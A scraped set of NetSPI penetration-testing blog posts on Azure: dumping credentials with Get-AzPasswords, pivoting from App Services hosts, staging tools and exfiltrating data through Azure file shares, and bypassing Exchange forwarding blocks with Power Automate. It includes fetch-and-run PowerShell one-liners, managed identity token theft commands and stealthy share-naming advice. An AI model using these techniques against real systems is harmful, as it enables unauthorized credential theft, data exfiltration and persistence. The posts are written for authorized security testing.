VERBOSE: Getting List of Azure Container Registries...
VERBOSE: Getting List of Storage Accounts...
VERBOSE:  Getting the Storage Account keys for the teststorage account
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE:  Getting the RunAs certificate for autoadmin using the XZvOYzsuBiGbfqe.ps1 Runbook
VERBOSE:   Waiting for the automation job to complete
VERBOSE:    Run AuthenticateAs-autoadmin-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE:   Removing XZvOYzsuBiGbfqe runbook from autoadmin Automation Account
VERBOSE:  Getting cleartext credentials for the autoadmin Automation Account
VERBOSE:   Getting cleartext credentials for test using the dOFtWgEXIQLlRfv.ps1 Runbook
VERBOSE:    Waiting for the automation job to complete
VERBOSE:    Removing dOFtWgEXIQLlRfv runbook from autoadmin Automation Account
VERBOSE: Password Dumping Activities Have Completed

*Running this will prompt you (via "Out-GridView") to select the subscription(s) to gather credentials from.

For easier output management, I'd recommend piping the output to either "Out-GridView" or "Export-CSV".

With that housekeeping out of the way, let's dive into the credentials that we're able to gather with Get-AzPasswords.

Key Vaults (-Keys Y)

Azure Key Vaults are Microsoft’s solution for storing sensitive data (Keys, Passwords/Secrets, Certs) in the Azure cloud. Inherently, Key Vaults are great sources for finding credential data. If you have a user with the correct rights, you should be able to read data out of the key stores.

Vault access is controlled by the Access Policies in each vault, but any users with Contributor rights are able to give themselves access to a Key Vault. Get-AzPasswords will not modify any Key Vault Access Policies, but you could give your account read permissions on the vault if you really needed to read a key.

An example Key Vault Secret:

Keyvault

Get-AzPasswords will export all of the secrets in cleartext, along with any certificates. You also have the option to save the certificate files locally with the "-ExportCerts Y" flag.

Sample Output:

Type : Key
Name : DiskKey
Username : N/A
Value : {"kid":"https://notArealVault.vault.azure.net/keys/DiskKey/63abcdefghijklmnop39","kty ":"RSA","key_ops":["sign","verify","wrapKey","unwrapKey","encrypt","decrypt"],"n":"v[REDACTED]w","e":"AQAB"}
PublishURL : N/A
Created : 5/19/2020 5:20:12 PM
Updated : 5/19/2020 5:20:12 PM
Enabled : True
Content Type : N/A
Vault : notArealVault
Subscription : NotARealSubscription

Type : Secret
Name : TestKey
Username : N/A
Value : Karl'sPassword
PublishURL : N/A
Created : 3/7/2019 9:28:37 PM
Updated : 3/7/2019 9:28:37 PM
Enabled : True
Content Type : Password
Vault : notArealVault
Subscription : NotARealSubscription
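The Key value in the first entry above is a JSON web key, and its "kid" URL encodes the vault, object type, key name, and version. A quick sketch (Python, with a helper name of my own choosing) for splitting a key identifier back into those parts, using the sample value from the output:

```python
from urllib.parse import urlparse

def parse_kid(kid):
    """Split a Key Vault key identifier URL into vault, type, name, and version."""
    parsed = urlparse(kid)
    vault = parsed.netloc.split(".")[0]        # 'notArealVault' from 'notArealVault.vault.azure.net'
    parts = parsed.path.strip("/").split("/")  # ['keys', 'DiskKey', '63abcdefghijklmnop39']
    return {"vault": vault, "type": parts[0], "name": parts[1], "version": parts[2]}

kid = "https://notArealVault.vault.azure.net/keys/DiskKey/63abcdefghijklmnop39"
print(parse_kid(kid))
```

This is handy when triaging a large export, since the vault and key names tell you where to look in the portal.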

Finally, access to the Key Vaults may be restricted by network, so you may need to run this from an Azure VM on the subscription, or from an IP in the approved "Private endpoint and selected networks" list. These settings can be found under the Networking tab in the Azure portal.

Alternatively, you may need to use an automation account "Run As" account to request the keys. Steps to complete that process are outlined here.

App Services (-AppServices Y)

Azure App Services are Microsoft’s option for rapid application deployment. Applications can be spun up quickly using app services and the configurations (passwords) are pushed to the applications via the App Services profiles.

In the portal, the App Services deployment passwords are typically found in the “Publish Profile” link that can be found in the top navigation bar within the App Services section. Any user with contributor rights to the application should be able to access this profile.

Appservices

These publish profiles will contain Web and FTP credentials that can be used to get access to the App Service's files. In addition, any stored connection strings should also be available in the file. All available profile credentials are parsed by Get-AzPasswords, so it's easy to gather credentials for multiple App Services applications at once.

Sample Output:

Type         : AppServiceConfig
Name         : appServicesApplication - Web Deploy
Username     : $appServicesApplication
Value        : dS[REDACTED]jM
PublishURL   : appServicesApplication.scm.azurewebsites.net:443
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription

Type         : AppServiceConfig
Name         : appServicesApplication - FTP
Username     : appServicesApplication$appServicesApplication
Value        : dS[REDACTED]jM
PublishURL   : ftp://appServicesApplication.ftp.azurewebsites.windows.net/site/wwwroot
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription

Type : AppServiceConfig
Name : appServicesApplication-Custom-ConnectionString
Username : N/A
Value : metadata=res://*/Models.appServicesApplication.csdl|res://*/Models.appServicesApplication.ssdl|res://*/Models.appServicesApplication.msl;provider=System.Data.SqlClient;provider connection string="Data Source=abcde.database.windows.net;Initial Catalog=app_Enterprise_Prod;Persist Security Info=True;User ID=psqladmin;Password=somepassword9" 
PublishURL : N/A
Created : N/A
Updated : N/A
Enabled : N/A
Content Type : ConnectionString
Vault : N/A
Subscription : NotARealSubscription

Potential next steps for App Services have been outlined in another NetSPI blog post here.
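The connection string in the last sample entry buries the SQL credentials inside a semicolon-delimited blob. A minimal sketch (Python, helper name my own) for splitting one into key/value pairs so the user and password fall out; the sample below reuses the inner connection string from the output above:

```python
def parse_conn_string(raw):
    """Split a semicolon-delimited connection string into a dict of key/value pairs."""
    pairs = {}
    for part in raw.split(";"):
        if "=" in part:
            key, _, value = part.partition("=")   # split on the first '=' only
            pairs[key.strip()] = value.strip().strip('"')
    return pairs

sample = ("Data Source=abcde.database.windows.net;Initial Catalog=app_Enterprise_Prod;"
          "Persist Security Info=True;User ID=psqladmin;Password=somepassword9")
creds = parse_conn_string(sample)
print(creds["Data Source"], creds["User ID"], creds["Password"])
```

Note that this naive split assumes the values themselves don't contain semicolons; the nested `provider connection string="..."` wrapper in the raw EF-style string would need to be peeled off first.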

Automation Accounts (-AutomationAccounts Y)

Automation Accounts are one of the ways that you can automate jobs and routine tasks within Azure. These tasks (Runbooks) are frequently run with stored credentials, or with the service account (Run As "Connections") tied to the Automation Account.

Automation

Both of these credential types can be returned with Get-AzPasswords and can potentially allow for privilege escalation. In order to gather these credentials from the Automation Accounts, we need to create new runbooks that will cast the credentials out to variables that are then printed to the runbook job output.

To protect these credentials in the output, we've implemented an encryption scheme in Get-AzPasswords that encrypts the job output.

Enccreds

The Run As certificates (covered in another blog) can then be used to authenticate (run the AuthenticateAs PS1 script) from your testing system as the stored Run As connection.

Authas

Any stored credentials may have a variety of uses, but I've frequently seen domain accounts being stored here, so that can lead to some interesting lateral movement options.

Sample Output:

Type : Azure Automation Account
Name : kfosaaen
Username : test
Value : testPassword
PublishURL : N/A
Created : N/A
Updated : N/A
Enabled : N/A
Content Type : Password
Vault : N/A
Subscription : NotARealSubscription

As a secondary note here, you can also request bearer tokens for the Run As automation accounts from a custom runbook. I cover the process in this blog post, but I think it's worth noting here, since it's not included in Get-AzPasswords, but it is an additional way to get a credential from an Automation Account.

And one final note on gathering credentials from Automation Accounts. It was noted above, but sometimes Azure Automation Accounts can be slow to respond. If you're having issues getting a runbook to run and you cancel the function execution before it completes, you will need to manually go in and clean up the runbooks that were created as part of the function execution.

Runbook

These will always be named with a 15-character random string of letters (IE: lwVSNvWYpPXCcDd). You will also have local files in your execution directory to clean up as well, and they will have the same name as the ones that were uploaded for execution.
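That naming convention makes leftovers easy to spot. A small sketch (my own helper, not part of MicroBurst) that generates a name the same way and flags local files matching the orphaned-runbook pattern:

```python
import random
import re
import string

def random_runbook_name(length=15):
    """Mimic the 15-character random letter names used for the temporary runbooks."""
    return "".join(random.choice(string.ascii_letters) for _ in range(length))

def looks_like_leftover(filename):
    """True if a filename matches the <15 letters>.ps1 pattern of an orphaned runbook."""
    return re.fullmatch(r"[A-Za-z]{15}\.ps1", filename) is not None

name = random_runbook_name()
print(name, looks_like_leftover(name + ".ps1"))
```

Pointing the second function at your execution directory's file listing is a quick way to find stragglers after an interrupted run.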

Storage Account Keys (-StorageAccounts Y)

Storage Accounts are the multipurpose (Public/Private files, tables, queues) service for storing data in an Azure subscription. This section is pretty simple compared to the previous ones, but gathering the account keys is an easy way to maintain persistence in a sensitive data store. These keys can be used with the Azure storage explorer application to remotely mount storage accounts.

Storage

These access keys can easily be cycled, but if you're looking for persistence in a Storage Account, these would be your best bet. Additionally, if you're modifying Cloud Shell files for escalation/persistence, I'd recommend holding on to a copy of these keys for any Cloud Shell storage accounts.

Sample Output:

Type         : Storage Account
Name         : notArealStorageAccount
Username     : key1
Value        : W84[REDACTED]==
PublishURL   : N/A
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Key
Vault        : N/A
Subscription : NotARealSubscription

Azure Container Registries (-ACR Y)

Azure Container Registries are used in Azure to manage Docker images for use within Azure Kubernetes Service (AKS) or as container instances (either in Azure or elsewhere). More often than not, we will find keys and credentials stored in these container images.

To authenticate to the repositories, you can either use the AZ CLI with AzureAD credentials, or use the registry's "Admin user" (if one is enabled). If you have AzureAD rights to pull the admin password for a container registry, you should already have rights to authenticate to the repositories with the AZ CLI; but if an Admin user is enabled for the registry, that account can be used for persistence after you lose access to the initial AzureAD user.

Container

Fun Fact - Any AzureAD user with "Reader" permissions on the Container Registry is able to connect to the repositories and pull images down with Docker.
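Registry login servers follow a fixed <registry>.azurecr.io pattern, so once you have credentials, assembling the docker login is mechanical. A sketch with placeholder values (the registry name and credentials below are made up):

```python
def acr_login_command(registry, username, password):
    """Build the docker login command line for an Azure Container Registry."""
    server = f"{registry}.azurecr.io"   # ACR login servers always use this suffix
    return f"docker login {server} -u {username} -p {password}"

print(acr_login_command("notarealregistry", "admin_user", "REDACTED"))
```

After logging in, `docker pull` against the same login server will bring images down for local inspection.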

For more information on using these credentials, here's another NetSPI blog.

Conclusion

There was a lot of ground to cover here, but hopefully this does a good job of explaining all of the functionality available in Get-AzPasswords. It's worth noting that most of this functionality relies on your AzureAD user having Contributor IAM rights on the applicable service. While some may argue that Contributor access is equivalent to admin in a subscription, I would argue that most subscriptions primarily consist of Contributor users.

If there are any sources for Azure passwords that you would like to see added to Get-AzPasswords, feel free to make a pull request on the MicroBurst GitHub repository.

A Beginners Guide to Gathering Azure Passwords (last modified March 16, 2023)

Lateral Movement in Azure App Services (published August 17, 2020)

We test a lot of web applications at NetSPI, and as everyone continues to move their operations into the cloud, we're running into more instances of applications being run on Azure App Services.

Top

Whenever we run into an App Services application with a serious vulnerability, I'll frequently get a ping asking about next steps to take in an Azure environment. This blog will hopefully answer some of those questions.

Initial Access

We will be primarily talking about command execution on an App Services host. There are plenty of other vulnerabilities (SQLi, SSRF, etc.) that we could put into the context of Azure App Services, but we'll save those for another blog.

For our command injection examples, we'll assume that you've used one of the following methods to execute commands on a system:

  • An uploaded web shell
  • Unintended CMD injection via an application issue
  • Intended CMD Injection through application functionality

Alternatively, keep in mind that Azure Portal Access (with an account with Contributor rights on an app) also allows you to run commands from the App Services Console. This will be important if there's a higher privileged Managed Identity in use by the app, and we want to use this to escalate Azure permissions.

Cmdsql

For the sake of simplicity, we'll also assume that this is a relatively clean command injection (See Web Shell), where you can easily see the results of your commands. If we want to get really complicated, we could talk about using side channels to exfiltrate command results, but that's also for another blog.

Azure "App Services"

To further complicate matters, Azure App Services encompasses "Function Apps" and "App Service Apps". There are some key differences between the two, but for the purposes of this blog, we'll consider them to be the same. Additionally, there are Linux and Windows options for both, so we'll try to cover options for those as well.

If you want to follow along with your own existing App Services app, you can use the Console (or SSH) section in the Development Tools section of the Azure Portal for your App Services app.

Appservices

Choose Your Own Adventure

With command execution on the App Services host, there are a couple of paths that you can take:

Looking Locally

First things first, this is an application server, so you might want to look at the application files.

  • The application source code files can (typically) be found at the %DEPLOYMENT_SOURCE%
  • The actual working files for the application can (typically) be found at %DEPLOYMENT_TARGET%
  • Or /home/site/wwwroot if you're working with a Linux system
Locally

If you're operating on a bare bones shell at this point, I would recommend pulling down an appropriate web shell to your %DEPLOYMENT_TARGET% (or /home/site/wwwroot) directory. This will allow you to upgrade your shell and allow you to better explore the host.

Just remember, this app server is likely facing the internet and a web shell without a password easily becomes someone else's web shell.

Within the source code files, you can also look for common application configuration files (web.config, etc.) that might contain additional secrets that you could use to pivot through to other services (as we'll see later in the blog).

Looking at the Environment

On an App Services host, most of your configuration variables will be available as environmental variables on the host. These variables will most likely contain keys that we can use to pivot to other Azure services in the subscription.

Since you're most likely to have a cmd.exe shell, you can just use the "set" command to list out all of the environmental variables. It will look like this (without the redactions):

Env Win

If you're using PowerShell for your command execution, you can use the "dir env: | ft -Wrap " command to do the same. Make sure that you're piping to "ft -wrap" as that will allow the full text values to be returned without being truncated.

Alternatively, if you're in a Linux shell, you can use the "printenv" command to accomplish the same:

Env Linux

Now that we (hopefully) have some connection strings for Azure services, we can start getting into other services.

Accessing Storage Accounts

If you're able to find an Azure Storage Account connection string, you should be able to remotely mount that storage account with the Azure Storage Explorer.

Here are a couple of common Windows environmental variables that hold those connection strings:

  • APPSETTING_AzureWebJobsStorage
  • APPSETTING_WEBSITE_CONTENTAZUREFILECONNECTIONSTRING
  • AzureWebJobsStorage
  • WEBSITE_CONTENTAZUREFILECONNECTIONSTRING

Additionally, you may find these strings in the application configuration files. Keep an eye out for any config files containing "core.windows.net", storage, blob, or file in them.
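Storage Account connection strings share one semicolon-delimited shape, so pulling the account name and key out for use with Storage Explorer is a one-liner. A sketch with made-up values (helper name is my own):

```python
def parse_storage_connection(conn):
    """Break an Azure Storage connection string into its key/value parts."""
    return dict(part.split("=", 1) for part in conn.split(";") if "=" in part)

conn = ("DefaultEndpointsProtocol=https;AccountName=notarealstorage;"
        "AccountKey=W84notarealkey==;EndpointSuffix=core.windows.net")
parts = parse_storage_connection(conn)
print(parts["AccountName"], parts["AccountKey"])
```

Splitting on the first `=` only matters here, since base64 account keys end in `=` padding.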

Using the Azure Storage Explorer, copy the Storage Account connection string and use that to add a new Storage Account.

Storage

Now that you have access to the Storage Account, you should be able to see any files that the application has rights to.

Storage


Accessing Azure SQL Databases

Similar to the Storage Accounts, you may find connection strings for Azure SQL in the configuration files or environmental variables. Most Azure SQL servers that I encounter have access locked down to specific IP ranges, so you may not be able to remotely access the servers from the internet. Every once in a while, we'll find a server with 0.0.0.0-255.255.255.255 in their allowed list, but that's pretty rare.

Azuresql

Since direct SQL access from the internet is unlikely, we will need an alternative that works from within the App Services host.

Azure SQL from Windows:

For Windows, we can plug in the values from our connection string and make use of PowerUpSQL to access Azure SQL databases.

Confirm Access to the "sql-test" Database on the "netspi-test" Azure SQL server:

D:\home\site\wwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLConnectionTest -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 | ft -wrap"


ComputerName                     Instance                         Status    
------------                     --------                         ------    
netspi-test.database.windows.net netspi-test.database.windows.net Accessible

Execute a query on the "sql-test" Database on the "netspi-test" Azure SQL server:

D:\home\site\wwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLQuery -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 -Query 'select @@version' | ft -wrap"


Column1                                                                        
-------                                                                        
Microsoft SQL Azure (RTM) - 12.0.2000.8                                        
    Jul 31 2020 08:26:29                                                          
    Copyright (C) 2019 Microsoft Corporation

From here, you can modify the query to search the database for more information.

For more ideas on pivoting via Azure SQL, check out the PowerUpSQL GitHub repository and Scott Sutherland's NetSPI blog author page.

Azure SQL from Linux:

For Linux hosts, you will need to check the stack that you're running (Node, Python, PHP, .NET Core, Ruby, or Java). In your shell, run "printenv | grep -i version" and look for things like RUBY_VERSION or PYTHON_VERSION.

For simplicity, we will assume that we are set up with the Python Stack and pyodbc is already installed as a module. For this, we will use a pretty basic Python script to query the database.

Other stacks will (most likely) require some different scripting or clients that are more compatible with the provided stack, but we'll save that for another blog.

Execute a query on the "sql-test" Database on the "netspi-test" Azure SQL server:

root@567327e35d3c:/home# cat sqlQuery.py
import pyodbc
server = 'netspi-test.database.windows.net'
database = 'sql-test'
username = 'MyUser'
password = '123Password456'
driver= '{ODBC Driver 17 for SQL Server}'

with pyodbc.connect('DRIVER='+driver+';SERVER='+server+';PORT=1433;DATABASE='+database+';UID='+username+';PWD='+ password) as conn:
        with conn.cursor() as cursor:
                cursor.execute("SELECT @@version")
                row = cursor.fetchone()
                while row:
                        print (str(row[0]))
                        row = cursor.fetchone()

root@567327e35d3c:/home# python sqlQuery.py
Microsoft SQL Azure (RTM) - 12.0.2000.8
        Jul 31 2020 08:26:29
        Copyright (C) 2019 Microsoft Corporation

Your best bet for deploying this script to the host is probably downloading it from a remote source. Trying to manually edit Python from the Azure web based SSH connection is not going to be a fun time.

More generally, trying to do much of anything in these Linux hosts may be tricky. For this blog, I was working in a sample app that I spun up for myself and immediately ran into multiple issues, so your mileage may vary here.

For more information about using Python with Azure SQL, check out Microsoft's documentation.

Abusing Managed Identities to Get Tokens

An application/VM/etc. can be configured with a Managed Identity that is given rights to specific resources in the subscription via IAM policies. This is a handy way of granting access to resources, but it can be used for lateral movement and privilege escalation.

We've previously covered Managed Identities for VMs on the Azure Privilege Escalation Using Managed Identities blog post. If the application is configured with a Managed Identity, you may be able to use the privileges of that identity to pivot to other resources in the subscription and potentially escalate privileges in the subscription/tenant.

In the next section, we'll cover getting tokens for a Managed Identity that can be used with the management.azure.com REST APIs to determine the resources that your identity has access to.

Getting Tokens

There are two different ways to get tokens out of your App Services application. Each of these depend on different versions of the REST API, so depending on the environmental variables that you have at your disposal, you may need to choose one or the other.

*Note that if you're following along in the Console, the Windows commands will require writing that token to a file first, as Curl doesn't play nice with the Console output.

Windows:

  • MSI Secret Option:
curl "%MSI_ENDPOINT%?resource=https://management.azure.com&api-version=2017-09-01" -H secret:%MSI_SECRET% -o token.txt
type token.txt
  • X-IDENTITY-HEADER Option:
curl "%IDENTITY_ENDPOINT%?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:%IDENTITY_HEADER% -o token.txt
type token.txt

Linux:

  • MSI Secret Option:
curl "$MSI_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$MSI_SECRET
  • X-IDENTITY-HEADER Option:
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER

For additional reference material on this process, check out the Microsoft documentation.
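The two request shapes differ only in the API version and the header name. A sketch (Python, with a helper name of my own; nothing is actually sent here, and the endpoint/secret values come from the environment at runtime) that assembles either variant:

```python
def build_token_request(endpoint, secret, resource="https://management.azure.com",
                        api_version="2019-08-01"):
    """Build the URL and headers for an App Services managed identity token request."""
    url = f"{endpoint}?resource={resource}&api-version={api_version}"
    # The 2017-09-01 API uses a 'secret' header; 2019-08-01 uses 'X-IDENTITY-HEADER'
    header = "secret" if api_version == "2017-09-01" else "X-IDENTITY-HEADER"
    return url, {header: secret}

url, headers = build_token_request("http://127.0.0.1:41714/msi/token", "fake-secret")
print(url)
print(headers)
```

Swapping the `resource` argument to https://vault.azure.net yields the vault-scoped variant used in the Key Vault section below.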

These tokens can now be used with the REST APIs to gather more information about the subscription. We could do an entire post covering all of the different ways you can gather data with these tokens, but here's a few key areas to focus on.

Accessing Key Vaults with Tokens

Using a Managed Identity token, you may be able to pivot over to any Key Vaults that the identity has access to. In order to retrieve these Key Vault values, we will need a token that's scoped to vault.azure.net. To get this vault token, use the previous process, and change the "resource" URL to https://vault.azure.net.

I would recommend setting two tokens as variables in PowerShell on your own system (outside of App Services):

$mgmtToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"
$kvToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"

And then pass those two variables into the following MicroBurst functions:

Get-AzKeyVaultKeysREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose
Get-AzKeyVaultSecretsREST -managementToken $mgmtToken -vaultToken $kvToken -Verbose

These functions will poll the subscription for any available Key Vaults, and attempt to read keys/secrets out of the vaults. In the example below, our Managed Identity only had access to one vault (netspi-private) and one secret (TestKey) in that vault.

Keyvault

Accessing Storage Accounts with Tokens

Outside of any existing storage accounts that may be configured in the app (See Above), there may be additional storage accounts that the Managed Identity has access to.

Use the Get-AZStorageKeysREST function within MicroBurst to dump out any additional available storage keys that the identity may have access to. This was previously covered in the Gathering Bearer Tokens from Azure Services blog, but you will want to use a token scope to management.azure.com with this function.

Get-AZStorageKeysREST -token YOUR_TOKEN_HERE

As previously mentioned, we could do a whole series on the different ways that we could use these Managed Identity tokens, so keep an eye out for future posts here.

Conclusion

Got a shell on an Azure App Services host? Don't assume that the cloud has (yet again) solved all the security problems in the world. There are plenty of options to potentially pivot from the App Services host, and hopefully you can use one of them from here.

From a defender's perspective, I have a couple of recommendations:

  • Test your web applications regularly
  • Utilize the Azure Web Application Firewalls (WAF) to help with coverage
  • Configure your Managed Identities with least privilege
    • Consider architecture that allows other identities in the subscription to do the heavy lifting
    • Don't give subscription-wide permissions to Managed Identities

Prior Work

I've been working on putting this together for a while, but during that time David Okeyode put out a recording of a presentation he did for the Virtual Azure Community Day that pretty closely follows these attack paths. Check out David's video for a great walkthrough of a real life scenario.

For other interesting work on Azure tokens, Tenant enumeration, and Azure AD, check out Dirk-jan Mollema's work on his blog. - https://dirkjanm.io/

Lateral Movement in Azure App Services (last modified March 16, 2023)

Get-AzPasswords: Encrypting Automation Password Data (published July 29, 2020)

Get-AzPasswords is a function within the MicroBurst toolkit that's used to get passwords from Azure subscriptions using the Az PowerShell modules. As part of this, the function supports gathering passwords and certificates that are attached to automation accounts.

These credentials can be stored in a few different ways:

  • Credentials - Username/Password combinations
  • Connections - Service Principal accounts that you can assume the identity of
  • Certificates - Certs that can be used in the runbooks

If you have the ability to write and run runbooks in an automation account, each of these credentials can be retrieved in a usable format (cleartext or files). All of the stored automation account credentials require runbooks to retrieve, and we really only have one easy option to return the credentials to Get-AzPasswords: print the credentials to the runbook output as part of the extraction script.

The Problem

The primary issue with writing these credentials to the runbook job output is the availability of those credentials to anyone that has rights to read the job output.

Ctcreds

By exporting credentials through the job output, an attacker could unintentionally expose automation account credentials to lesser privileged users, resulting in an opportunity for privilege escalation. As responsible pen testers, we don't want to leave an environment more vulnerable than it was when we started testing, so outputting the credentials to the output logs in cleartext is not acceptable.

The Solution

To work around this issue, we've implemented a certificate-based encryption scheme in the Get-AzPasswords function to encrypt any credentials in the log output.

The automation account portion of the Get-AzPasswords function now uses the following process:

  1. Create a new self-signed certificate (microburst) on the system that is running the function
  2. Export the public certificate to a local file
  3. Encode the certificate file into a base64 string to use in the automation runbook
  4. Decode the base64 bytes to a cer file and import the certificate in the automation account
  5. Use the certificate to encrypt (Protect-CmsMessage) the credential data before it's written to the output
  6. Decrypt (Unprotect-CmsMessage) the output when it's retrieved on the testing system
  7. Remove the self-signed cert and remove the local file from the testing system

This process protects the credentials in the logs and in transit. Since each certificate is generated at runtime, there's less concern of someone decrypting the credential data from the logs after the fact.
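Steps 3 and 4 of that process are plain base64 shuffling. A sketch of the encode/decode round trip (the certificate bytes below are stand-ins, not a real cert):

```python
import base64

cert_bytes = b"-----BEGIN CERTIFICATE-----\nMIIB...fake...\n-----END CERTIFICATE-----"

# Step 3: encode the exported public cert so it can be embedded in the runbook text
encoded = base64.b64encode(cert_bytes).decode("ascii")

# Step 4: inside the runbook, decode the string back to a .cer file for import
decoded = base64.b64decode(encoded)

print(decoded == cert_bytes)
```

The PowerShell equivalents are `[Convert]::ToBase64String` and `[Convert]::FromBase64String`; the encryption itself is handled separately by Protect-CmsMessage against the imported cert.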

The Results

Those same credentials from above will now look like this in the output logs:

Enccreds

On the Get-AzPasswords side of this, you won't see any difference from previous versions. Any credentials gathered from automation accounts will still be available in cleartext in the script output, but now the credentials will be protected in the output logs.

For anyone making use of Get-Azpasswords in MicroBurst, make sure that you grab the latest version from NetSPI's GitHub - https://github.com/NetSPI/MicroBurst

Get-AzPasswords: Encrypting Automation Password Data (last modified April 28, 2023; the following post was published July 16, 2020)

For many years, pentester-hosted SMB shares have been a common technology to use during internal penetration tests for getting tools over to, and data off of, target systems. The process is simple: share a folder from your testing system, execute a "net use z: \\testingbox\tools" from your target, and run your tools from the share.

For a long time, this could be used to evade host-based protection software. While this is all based on anecdotal evidence, I believe that this was mainly due to the defensive software being cautious with network shares. If AV detects a payload on a shared drive (“Finance”) and quarantines the whole share, that could impact multiple users on the network.

As we’ve all continued to migrate up to the cloud, we’re finding that SMB shares can still be used for testing, and can be augmented using cloud services. As I previously mentioned on the NetSPI blog, Azure services can be a handy way to bypass outbound domain filters/restrictions during assessments. Microsoft-hosted Azure file shares can be used, just like the previously mentioned on-prem SMB shares, to run tools and exfiltrate data.

Setting Up Azure File Shares

Using Azure storage accounts, it’s simple to set up a file share service. Create a new account in your subscription, or navigate to the Storage Account that you want to use for your testing and click the “+ File Share” tab to create a new file share.

For both the file share and the storage account name, I would recommend using names that attempt to look legitimate. Ultimately the share path may end up in log files, so something along the lines of \\hackertools.file.core.windows.net\payloads may be a bad choice.

Connecting to Shares

After setting up the share, mapping the drive from a Windows host is pretty simple. You can just copy the PowerShell code directly from the Azure Portal.

Or you can simplify things and remove the connectTestResult commands from the above command:

cmd.exe /C "cmdkey /add:`"STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"Azure\STORAGE_ACCT_NAME`" /pass:`"STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | out-null

Where STORAGE_ACCT_NAME is the name of your storage account, and STORAGE_ACCT_KEY is the key used for mapping shares (found under “Access Keys” in the Storage Account menu).

I've found that the connection test code will frequently fail, even if you can map the drive. So there's not a huge benefit in keeping that connection test in the script.

Now that we have our drive mapped, you can run your tools from the drive. Your mileage may vary for different executables, but I’ve recently had luck using this technique as a way of getting tools onto, and data out of, a cloud-hosted system that I had access to.

Removing Shares

As for cleanup, we will want to remove the added drive when we are done, and remove any cmdkey entries from our target system.

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

It also wouldn’t hurt to cycle those keys on our end to prevent the old ones from being used again. This can be done using the blue refresh button from the “Access Keys” section in the portal.

To make this a little more portable for a cloud environment, where we may be executing PowerShell on VMs through cloud functions, we can just do everything in one script:

cmd.exe /C "cmdkey /add:`"STORAGE_ACCT_NAME.file.core.windows.net`" /user:`"Azure\STORAGE_ACCT_NAME`" /pass:`"STORAGE_ACCT_KEY`""
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\STORAGE_ACCT_NAME.file.core.windows.net\tools" | out-null

# Insert Your Commands Here

Remove-PSDrive -Name Z
cmd.exe /C "cmdkey /delete:`"STORAGE_ACCT_NAME.file.core.windows.net`""

*You may need to change the mapped PS Drive letter, if it’s already in use.

I was recently able to use this in an AWS environment with the Run Command feature in the AWS Systems Manager service, but this could work anywhere that you have command execution on a host, and want to stay off of the local disk.

Conclusion

The one big caveat for this methodology is the availability of outbound SMB connections. While you may assume that most networks would disallow outbound SMB to the internet, it’s actually pretty rare for us to see outbound restrictions on SMB traffic from cloud provider (AWS, Azure, etc.) networks. Most default cloud network policies allow all outbound ports and protocols to all destinations. So this may get more mileage during your assessments against cloud hosts, but don't be surprised if you can use Azure file shares from an internal network.
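Before relying on this during an assessment, it's worth confirming that outbound TCP 445 actually leaves the network you're on. Here's a minimal Python sketch of that check; the storage account hostname in the comment is a placeholder, and the helper name is my own:

```python
import socket

def smb_outbound_allowed(host, port=445, timeout=3):
    """Return True if a TCP connection to host:port succeeds (SMB uses 445)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Example (placeholder hostname - substitute your own storage account):
# smb_outbound_allowed("STORAGE_ACCT_NAME.file.core.windows.net")
```

If this returns False from your target host, the share-mapping commands above will fail, and you'll want a different exfiltration channel.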

[post_title] => Azure File Shares for Pentesters [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-file-shares-for-pentesters [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:27:15 [post_modified_gmt] => 2023-03-16 14:27:15 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11709 [menu_order] => 480 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [26] => WP_Post Object ( [ID] => 11569 [post_author] => 10 [post_date] => 2020-06-25 07:00:40 [post_date_gmt] => 2020-06-25 07:00:40 [post_content] =>

During a recent Office 365 assessment, we ran into an interesting situation where Exchange was configured to disallow any external domain forwarding rules. This configuration is intended to prevent attackers from compromising an account and setting up forwarding for remote mail access and persistence. Part of this assessment was to validate that these configurations were properly implemented, and also to look for potential bypasses for this configuration.

Power Automate

As part of the Office 365 environment, we had access to the Power Automate application. Formerly known as Microsoft Flow, Power Automate is a framework for gluing together multiple services for automation tasks within Office 365.

Want to get an email every time someone uploads a file to your shared OneDrive folder? Connect Outlook and OneDrive in Power Automate and set up a flow. I like to think of it as IFTTT for the Microsoft ecosystem.

Forwarding Email

Since we were able to create connections and flows in Power Automate, we decided to connect Power Automate to Office 365 Outlook and create a flow for forwarding email to a NetSPI email address.

You can use the following process to set up external mail forwarding with Power Automate:

1. Under the Data menu, select "Connections".


2. Select "New Connection" at the top of the window, and find the "Office 365 Outlook" connection.


3. Select "Create" on the connection and authorize the connection under the OAuth pop-up.

4. Navigate to the "Create" section from the left navigation menu, and select "Automated flow".


